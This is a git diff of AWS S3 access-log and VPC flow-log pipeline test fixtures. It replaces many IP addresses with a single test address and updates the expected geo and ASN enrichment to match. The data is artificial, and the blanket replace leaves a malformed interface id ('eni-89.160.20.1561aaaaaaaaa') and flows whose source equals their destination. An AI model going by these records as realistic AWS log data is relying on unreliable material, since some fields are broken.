"BsCfJedfuSnds2QFoxi+E/O7M6OEWzJnw4dUaes/2hyA363sONRJKzB7EOY+Bt9DTHYUn+HoHxI=", "host_header": "s3.ap-southeast-1.amazonaws.com", "bucket": "test-s3-ks", - "remote_ip": "72.21.217.31", + "remote_ip": "89.160.20.156", "cipher_suite": "ECDHE-RSA-AES128-SHA", "http_status": 200, "total_time": 17, @@ -117,15 +117,15 @@ "preserve_original_event" ], "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Virginia", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 17.8167, + "lat": 59.2 } }, "cloud": { @@ -139,7 +139,7 @@ "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2" ], "ip": [ - "72.21.217.31" + "89.160.20.156" ] }, "http": { @@ -158,8 +158,8 @@ "user": { "id": "arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9" }, - "address": "72.21.217.31", - "ip": "72.21.217.31" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "tls": { "cipher": "ECDHE-RSA-AES128-SHA", @@ -168,8 +168,8 @@ }, "event": { "duration": 3000000, - "ingested": "2021-07-19T21:47:05.259677600Z", - "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:42 +0000] 72.21.217.31 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 E26222010BCC32B6 REST.GET.LOCATION - \"GET /test-s3-ks/?location\u0026aws-account=627959692251 HTTP/1.1\" 200 - 142 - 3 - \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - gNl/Q1IzY6nGTBygqI3rnMz/ZFOFwOTDpSMrNca+IcEmMAd6sCIs1ZRLYDekD8LB9lrj9UdQLWE= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", + "ingested": "2021-12-09T16:11:59.134198700Z", + "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:42 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 E26222010BCC32B6 REST.GET.LOCATION - \"GET /test-s3-ks/?location\u0026aws-account=627959692251 HTTP/1.1\" 200 - 142 - 3 - \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - gNl/Q1IzY6nGTBygqI3rnMz/ZFOFwOTDpSMrNca+IcEmMAd6sCIs1ZRLYDekD8LB9lrj9UdQLWE= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", "kind": "event", "action": "REST.GET.LOCATION", "id": "E26222010BCC32B6", @@ -190,7 +190,7 @@ "host_id": "gNl/Q1IzY6nGTBygqI3rnMz/ZFOFwOTDpSMrNca+IcEmMAd6sCIs1ZRLYDekD8LB9lrj9UdQLWE=", "host_header": "s3.ap-southeast-1.amazonaws.com", "bucket": "test-s3-ks", - "remote_ip": "72.21.217.31", + "remote_ip": "89.160.20.156", "cipher_suite": "ECDHE-RSA-AES128-SHA", "http_status": 200, "total_time": 3, @@ -224,15 +224,15 @@ "preserve_original_event" ], "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Virginia", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 17.8167, + "lat": 59.2 } }, "cloud": { @@ -246,7 +246,7 @@ "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2" ], "ip": [ - "72.21.217.31" + "89.160.20.156" ] }, "http": { @@ -265,8 +265,8 @@ "user": { "id": "arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9" }, - "address": "72.21.217.31", - "ip": "72.21.217.31" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "tls": { "cipher": "ECDHE-RSA-AES128-SHA", @@ -275,8 +275,8 @@ }, "event": { "duration": 2000000, - "ingested": "2021-07-19T21:47:05.259687800Z", - "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:43 +0000] 72.21.217.31 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 4DD6D17D1C5C401C REST.GET.BUCKET - \"GET /test-s3-ks/?max-keys=0\u0026encoding-type=url\u0026aws-account=627959692251 HTTP/1.1\" 200 - 265 - 2 1 \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - KzvchfojYQnuFC4PABYVJVxIlv/f6r17LRaTSvw7x+bxj4PkkPKT1kX9x8wbqtq40iD4PC881iE= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", + "ingested": "2021-12-09T16:11:59.134204100Z", + "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:43 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 4DD6D17D1C5C401C REST.GET.BUCKET - \"GET /test-s3-ks/?max-keys=0\u0026encoding-type=url\u0026aws-account=627959692251 HTTP/1.1\" 200 - 265 - 2 1 \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - KzvchfojYQnuFC4PABYVJVxIlv/f6r17LRaTSvw7x+bxj4PkkPKT1kX9x8wbqtq40iD4PC881iE= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", "kind": "event", "action": "REST.GET.BUCKET", "id": "4DD6D17D1C5C401C", @@ -298,7 +298,7 @@ "host_id": "KzvchfojYQnuFC4PABYVJVxIlv/f6r17LRaTSvw7x+bxj4PkkPKT1kX9x8wbqtq40iD4PC881iE=", "host_header": "s3.ap-southeast-1.amazonaws.com", "bucket": "test-s3-ks", - "remote_ip": "72.21.217.31", + "remote_ip": "89.160.20.156", "cipher_suite": "ECDHE-RSA-AES128-SHA", "http_status": 200, "total_time": 2, @@ -332,15 +332,15 @@ "preserve_original_event" ], "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Virginia", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 17.8167, + "lat": 59.2 } }, "cloud": { @@ -354,7 +354,7 @@ "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2" ], "ip": [ - "72.21.217.31" + "89.160.20.156" ] }, "http": { @@ -373,8 +373,8 @@ "user": { "id": "arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9" }, - "address": "72.21.217.31", - "ip": "72.21.217.31" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "tls": { "cipher": "ECDHE-RSA-AES128-SHA", @@ -383,8 +383,8 @@ }, "event": { "duration": 4000000, - "ingested": "2021-07-19T21:47:05.259697800Z", - "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:43 +0000] 72.21.217.31 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 706992E2F3CC3C3D REST.GET.LOCATION - \"GET /test-s3-ks/?location\u0026aws-account=627959692251 HTTP/1.1\" 200 - 142 - 4 - \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - cIN12KTrJwx+uTBZD+opZUPE4iGypi8oG/oXGPzFk9CMuHQGuEpmAeNELdtYKDxf2TDor25Nikg= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", + "ingested": "2021-12-09T16:11:59.134208400Z", + "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:43 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 706992E2F3CC3C3D REST.GET.LOCATION - \"GET /test-s3-ks/?location\u0026aws-account=627959692251 HTTP/1.1\" 200 - 142 - 4 - \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - cIN12KTrJwx+uTBZD+opZUPE4iGypi8oG/oXGPzFk9CMuHQGuEpmAeNELdtYKDxf2TDor25Nikg= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", "kind": "event", "action": "REST.GET.LOCATION", "id": "706992E2F3CC3C3D", @@ -405,7 +405,7 @@ "host_id": "cIN12KTrJwx+uTBZD+opZUPE4iGypi8oG/oXGPzFk9CMuHQGuEpmAeNELdtYKDxf2TDor25Nikg=", "host_header": "s3.ap-southeast-1.amazonaws.com", "bucket": "test-s3-ks", - "remote_ip": "72.21.217.31", + "remote_ip": "89.160.20.156", "cipher_suite": "ECDHE-RSA-AES128-SHA", "http_status": 200, "total_time": 4, @@ -435,14 +435,14 @@ ], "geo": { "continent_name": "Europe", - "region_iso_code": "ES-TE", - "city_name": "Teruel", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Teruel", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -1.1065, - "lat": 40.3456 + "lon": 17.8167, + "lat": 59.2 } }, "cloud": { @@ -456,15 +456,15 @@ "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2" ], "ip": [ - "77.227.156.41" + "89.160.20.156" ] }, "client": { "user": { "id": "arn:aws:iam::123456:user/test@elastic.co" }, - "address": "77.227.156.41", - "ip": "77.227.156.41" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "http": { "response": { @@ -477,8 +477,8 @@ "version_protocol": "tls" }, "event": { - "ingested": "2021-07-19T21:47:05.259707700Z", - "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 jsoriano-s3-test [10/Sep/2019:15:11:07 +0000] 77.227.156.41 arn:aws:iam::123456:user/test@elastic.co 8CD7A4A71E2E5C9E BATCH.DELETE.OBJECT jolokia-war-1.5.0.war - 204 - - 344017 - - - - - IeDW5I3wefFxU8iHOcAzi5qr+O+1bdRlcQ0AO2WGjFh7JwYM6qCoKq+1TrUshrXMlBxPFtg97Vk= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.eu-central-1.amazonaws.com TLSv1.2", + "ingested": "2021-12-09T16:11:59.134212900Z", + "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 jsoriano-s3-test [10/Sep/2019:15:11:07 +0000] 89.160.20.156 arn:aws:iam::123456:user/test@elastic.co 8CD7A4A71E2E5C9E BATCH.DELETE.OBJECT jolokia-war-1.5.0.war - 204 - - 344017 - - - - - IeDW5I3wefFxU8iHOcAzi5qr+O+1bdRlcQ0AO2WGjFh7JwYM6qCoKq+1TrUshrXMlBxPFtg97Vk= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.eu-central-1.amazonaws.com TLSv1.2", "kind": "event", "action": "BATCH.DELETE.OBJECT", "id": "8CD7A4A71E2E5C9E", @@ -497,7 +497,7 @@ "host_id": "IeDW5I3wefFxU8iHOcAzi5qr+O+1bdRlcQ0AO2WGjFh7JwYM6qCoKq+1TrUshrXMlBxPFtg97Vk=", "host_header": "s3.eu-central-1.amazonaws.com", "bucket": "jsoriano-s3-test", - "remote_ip": "77.227.156.41", + "remote_ip": "89.160.20.156", "cipher_suite": "ECDHE-RSA-AES128-SHA", "http_status": 204, "bucket_owner": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2", @@ -513,15 +513,15 @@ "preserve_original_event" ], "geo": { - "continent_name": "North America", - "region_iso_code": "US-CO", - "city_name": "Denver", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Colorado", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -105.0023, - "lat": 39.7044 + "lon": 17.8167, + "lat": 59.2 } }, "cloud": { @@ -535,15 +535,15 @@ "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2" ], "ip": [ - "174.29.206.152" + "89.160.20.156" ] }, "client": { "user": { "id": "arn:aws:iam::123456:user/test@elastic.co" }, - "address": "174.29.206.152", - "ip": "174.29.206.152" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "http": { "response": { @@ -556,8 +556,8 @@ "version_protocol": "tls" }, "event": { - "ingested": "2021-07-19T21:47:05.259717600Z", - "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [19/Sep/2019:17:06:39 +0000] 174.29.206.152 arn:aws:iam::123456:user/test@elastic.co 6CE38F1312D32BDD BATCH.DELETE.OBJECT Screen+Shot+2019-09-09+at+9.08.44+AM.png - 204 - - 57138 - - - - - LwRa4w6DbuU48GKQiH3jDbjfTyLCbwasFBsdttugRQ+9lH4jK8lT91+HhGZKMYI3sPyKuQ9LvU0= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", + "ingested": "2021-12-09T16:11:59.134217300Z", + "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [19/Sep/2019:17:06:39 +0000] 89.160.20.156 arn:aws:iam::123456:user/test@elastic.co 6CE38F1312D32BDD BATCH.DELETE.OBJECT Screen+Shot+2019-09-09+at+9.08.44+AM.png - 204 - - 57138 - - - - - LwRa4w6DbuU48GKQiH3jDbjfTyLCbwasFBsdttugRQ+9lH4jK8lT91+HhGZKMYI3sPyKuQ9LvU0= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", "kind": "event", "action": "BATCH.DELETE.OBJECT", "id": "6CE38F1312D32BDD", @@ -576,7 +576,7 @@ "host_id": "LwRa4w6DbuU48GKQiH3jDbjfTyLCbwasFBsdttugRQ+9lH4jK8lT91+HhGZKMYI3sPyKuQ9LvU0=", "host_header": "s3.ap-southeast-1.amazonaws.com", "bucket": "test-s3-ks", - "remote_ip": "174.29.206.152", + "remote_ip": "89.160.20.156", "cipher_suite": "ECDHE-RSA-AES128-SHA", "http_status": 204, "bucket_owner": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2", @@ -628,7 +628,7 @@ }, "event": { "duration": 103000000, - "ingested": "2021-07-19T21:47:05.259727500Z", + "ingested": "2021-12-09T16:11:59.134221Z", "original": "67797214d75628047d9c76b18a78cded1a4b069b71f2a9d5a53649c38da8770b flow-log-test [14/Jul/2021:18:57:31 +0000] - svc:delivery.logs.amazonaws.com MVGXZXEVN3IG9S24 REST.PUT.OBJECT AWSLogs/000000000000/vpcflowlogs/us-gov-east-1/2021/07/13/000000000000_vpcflowlogs_us-gov-east-1_fl-_20210713T1855Z_f12aa632.log.gz \"PUT /AWSLogs/000000000000/vpcflowlogs/us-gov-east-1/2021/07/13/000000000000_vpcflowlogs_us-gov-east-1_fl-0e7c13bf00cf15bfe_20210713T1855Z_f12aa632.log.gz HTTP/1.1\" 200 - - 773 103 13 \"-\" \"-\" - 02SxwfXpO5UysN0GsKGa3uGDQ6E/W7+Hwo/luRH8p1VEexULoe66RCM+nja0dEq2JqLrtgjocvVRRkVt4= SigV4 ECDHE-RSA-AES128-GCM-SHA256 AuthHeader flow-log-test.s3.us-gov-west-1.amazonaws.com TLSv1.2 -", "kind": "event", "action": "REST.PUT.OBJECT", diff --git a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-extra-samples.log b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-extra-samples.log index 3024fccfc39..808ade66dcb 100644 --- a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-extra-samples.log +++ b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-extra-samples.log @@ -1,7 +1,7 @@ -2 123456789010 eni-1235b8ca123456789 2001:db8:1234:a100:8d6e:3477:df66:f105 2001:db8:1234:a102:3304:8879:34cf:4071 34892 22 6 54 8855 1477913708 1477913820 ACCEPT OK +2 123456789010 eni-1235b8ca123456789 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 34892 22 6 54 8855 1477913708 1477913820 ACCEPT OK 2 123456789010 eni-1235b8ca123456789 - - - - - - - 1431280876 1431280934 - NODATA -2 123456789010 eni-11111111aaaaaaaaa - - - - - - - 1431280876 1431280934 - SKIPDATA -2 123456789010 eni-1235b8ca123456789 78.24.182.42 158.109.0.1 20641 22 6 20 4249 1418530010 1418530070 ACCEPT OK -2 123456789010 eni-1235b8ca123456789 78.24.182.42 158.109.0.1 49761 3389 6 20 4249 1418530010 1418530070 REJECT OK -2 123456789010 eni-1235b8ca123456789 203.0.113.12 172.31.16.139 0 0 1 4 336 1432917027 1432917142 ACCEPT OK -2 123456789010 eni-1235b8ca123456789 172.31.16.139 203.0.113.12 0 0 1 4 336 1432917094 1432917142 REJECT OK \ No newline at end of file +2 123456789010 eni-89.160.20.1561aaaaaaaaa - - - - - - - 1431280876 1431280934 - SKIPDATA +2 123456789010 eni-1235b8ca123456789 89.160.20.156 89.160.20.156 20641 22 6 20 4249 1418530010 1418530070 ACCEPT OK +2 123456789010 eni-1235b8ca123456789 89.160.20.156 89.160.20.156 49761 3389 6 20 4249 1418530010 1418530070 REJECT OK +2 123456789010 eni-1235b8ca123456789 89.160.20.156 172.31.16.139 0 0 1 4 336 1432917027 1432917142 ACCEPT OK +2 123456789010 eni-1235b8ca123456789 172.31.16.139 89.160.20.156 0 0 1 4 336 1432917094 1432917142 REJECT OK \ No newline at end of file diff --git a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-extra-samples.log-expected.json b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-extra-samples.log-expected.json index 9ddf227c12e..77a00b72a08 100644 --- a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-extra-samples.log-expected.json +++ b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-extra-samples.log-expected.json @@ -2,22 +2,52 @@ "expected": [ { "destination": { + "geo": { + "continent_name": "Europe", + "country_name": "Denmark", + "location": { + "lon": 10.0, + "lat": 56.0 + }, + "country_iso_code": "DK" + }, + "as": { + "number": 62121, + "organization": { + "name": "Christian Ebsen ApS" + } + }, + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "port": 22, - "address": "2001:db8:1234:a102:3304:8879:34cf:4071", - "ip": "2001:db8:1234:a102:3304:8879:34cf:4071" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "source": { - "address": "2001:db8:1234:a100:8d6e:3477:df66:f105", + "geo": { + "continent_name": "Europe", + "country_name": "Denmark", + "location": { + "lon": 10.0, + "lat": 56.0 + }, + "country_iso_code": "DK" + }, + "as": { + "number": 62121, + "organization": { + "name": "Christian Ebsen ApS" + } + }, + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "port": 34892, "bytes": 8855, - "packets": 54, - "ip": "2001:db8:1234:a100:8d6e:3477:df66:f105" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "packets": 54 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:hXZclvxUJScaVf0xMIJR6yW6tBQ=", + "community_id": "1:3piNHoW0DjbrWkF//BeRomCaOZQ=", "transport": "tcp", "type": "ipv6", "bytes": 8855, @@ -36,13 +66,13 @@ }, "related": { "ip": [ - "2001:db8:1234:a100:8d6e:3477:df66:f105", - "2001:db8:1234:a102:3304:8879:34cf:4071" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "event": { - "ingested": "2021-09-28T19:10:43.075027100Z", - "original": "2 123456789010 eni-1235b8ca123456789 2001:db8:1234:a100:8d6e:3477:df66:f105 2001:db8:1234:a102:3304:8879:34cf:4071 34892 22 6 54 8855 1477913708 1477913820 ACCEPT OK", + "ingested": "2021-12-09T16:12:00.503382700Z", + "original": "2 123456789010 eni-1235b8ca123456789 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 34892 22 6 54 8855 1477913708 1477913820 ACCEPT OK", "kind": "event", "start": "2016-10-31T11:35:08.000Z", "end": "2016-10-31T11:37:00.000Z", @@ -72,7 +102,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-28T19:10:43.075037500Z", + "ingested": "2021-12-09T16:12:00.503391600Z", "original": "2 123456789010 eni-1235b8ca123456789 - - - - - - - 1431280876 1431280934 - NODATA", "kind": "event", "start": "2015-05-10T18:01:16.000Z", @@ -104,8 +134,8 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-28T19:10:43.075045100Z", - "original": "2 123456789010 eni-11111111aaaaaaaaa - - - - - - - 1431280876 1431280934 - SKIPDATA", + "ingested": "2021-12-09T16:12:00.503397800Z", + "original": "2 123456789010 eni-89.160.20.1561aaaaaaaaa - - - - - - - 1431280876 1431280934 - SKIPDATA", "kind": "event", "start": "2015-05-10T18:01:16.000Z", "end": "2015-05-10T18:02:14.000Z", @@ -116,7 +146,7 @@ "vpcflow": { "account_id": "123456789010", "log_status": "SKIPDATA", - "interface_id": "eni-11111111aaaaaaaaa", + "interface_id": "eni-89.160.20.1561aaaaaaaaa", "version": "2" } }, @@ -128,53 +158,56 @@ "destination": { "geo": { "continent_name": "Europe", - "country_name": "Spain", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -3.684, - "lat": 40.4172 - }, - "country_iso_code": "ES" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 13041, + "number": 29518, "organization": { - "name": "Consorci de Serveis Universitaris de Catalunya" + "name": "Bredband2 AB" } }, - "address": "158.109.0.1", + "address": "89.160.20.156", "port": 22, - "ip": "158.109.0.1" + "ip": "89.160.20.156" }, "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "RU-MOW", - "city_name": "Moscow", - "country_iso_code": "RU", - "country_name": "Russia", - "region_name": "Moscow", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 37.6172, - "lat": 55.7527 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 35377, + "number": 29518, "organization": { - "name": "Ao a.b.n." + "name": "Bredband2 AB" } }, - "address": "78.24.182.42", + "address": "89.160.20.156", "port": 20641, "bytes": 4249, - "ip": "78.24.182.42", + "ip": "89.160.20.156", "packets": 20 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:Ln/vlDqu658GHymxjnRAaUF8KS4=", + "community_id": "1:CEGBlG6oEeW2Y5LLdr9GONITz00=", "transport": "tcp", "type": "ipv4", "bytes": 4249, @@ -193,13 +226,13 @@ }, "related": { "ip": [ - "78.24.182.42", - "158.109.0.1" + "89.160.20.156", + "89.160.20.156" ] }, "event": { - "ingested": "2021-09-28T19:10:43.075052500Z", - "original": "2 123456789010 eni-1235b8ca123456789 78.24.182.42 158.109.0.1 20641 22 6 20 4249 1418530010 1418530070 ACCEPT OK", + "ingested": "2021-12-09T16:12:00.503403700Z", + "original": "2 123456789010 eni-1235b8ca123456789 89.160.20.156 89.160.20.156 20641 22 6 20 4249 1418530010 1418530070 ACCEPT OK", "kind": "event", "start": "2014-12-14T04:06:50.000Z", "end": "2014-12-14T04:07:50.000Z", @@ -221,53 +254,56 @@ "destination": { "geo": { "continent_name": "Europe", - "country_name": "Spain", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -3.684, - "lat": 40.4172 - }, - "country_iso_code": "ES" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 13041, + "number": 29518, "organization": { - "name": "Consorci de Serveis Universitaris de Catalunya" + "name": "Bredband2 AB" } }, - "address": "158.109.0.1", + "address": "89.160.20.156", "port": 3389, - "ip": "158.109.0.1" + "ip": "89.160.20.156" }, "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "RU-MOW", - "city_name": "Moscow", - "country_iso_code": "RU", - "country_name": "Russia", - "region_name": "Moscow", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 37.6172, - "lat": 55.7527 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 35377, + "number": 29518, "organization": { - "name": "Ao a.b.n." + "name": "Bredband2 AB" } }, - "address": "78.24.182.42", + "address": "89.160.20.156", "port": 49761, "bytes": 4249, - "ip": "78.24.182.42", + "ip": "89.160.20.156", "packets": 20 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:E3lDDGXG7D8azpdrN7WMLPJe30w=", + "community_id": "1:va8LK/uEqYpj4NoZ9/5WRLio5rs=", "transport": "tcp", "type": "ipv4", "bytes": 4249, @@ -286,13 +322,13 @@ }, "related": { "ip": [ - "78.24.182.42", - "158.109.0.1" + "89.160.20.156", + "89.160.20.156" ] }, "event": { - "ingested": "2021-09-28T19:10:43.075060Z", - "original": "2 123456789010 eni-1235b8ca123456789 78.24.182.42 158.109.0.1 49761 3389 6 20 4249 1418530010 1418530070 REJECT OK", + "ingested": "2021-12-09T16:12:00.503409900Z", + "original": "2 123456789010 eni-1235b8ca123456789 89.160.20.156 89.160.20.156 49761 3389 6 20 4249 1418530010 1418530070 REJECT OK", "kind": "event", "start": "2014-12-14T04:06:50.000Z", "end": "2014-12-14T04:07:50.000Z", @@ -317,17 +353,35 @@ "ip": "172.31.16.139" }, "source": { - "address": "203.0.113.12", + "geo": { + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", + "location": { + "lon": 17.8167, + "lat": 59.2 + } + }, + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } + }, + "address": "89.160.20.156", "port": 0, "bytes": 336, - "packets": 4, - "ip": "203.0.113.12" + "ip": "89.160.20.156", + "packets": 4 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:H//CCQJhRqDUJ9c23S0VrQ+drxU=", + "community_id": "1:cttDCHp3UNR8SFNTOgVYpAceHf4=", "type": "ipv4", "bytes": 336, "iana_number": "1", @@ -345,13 +399,13 @@ }, "related": { "ip": [ - "203.0.113.12", + "89.160.20.156", "172.31.16.139" ] }, "event": { - "ingested": "2021-09-28T19:10:43.075068700Z", - "original": "2 123456789010 eni-1235b8ca123456789 203.0.113.12 172.31.16.139 0 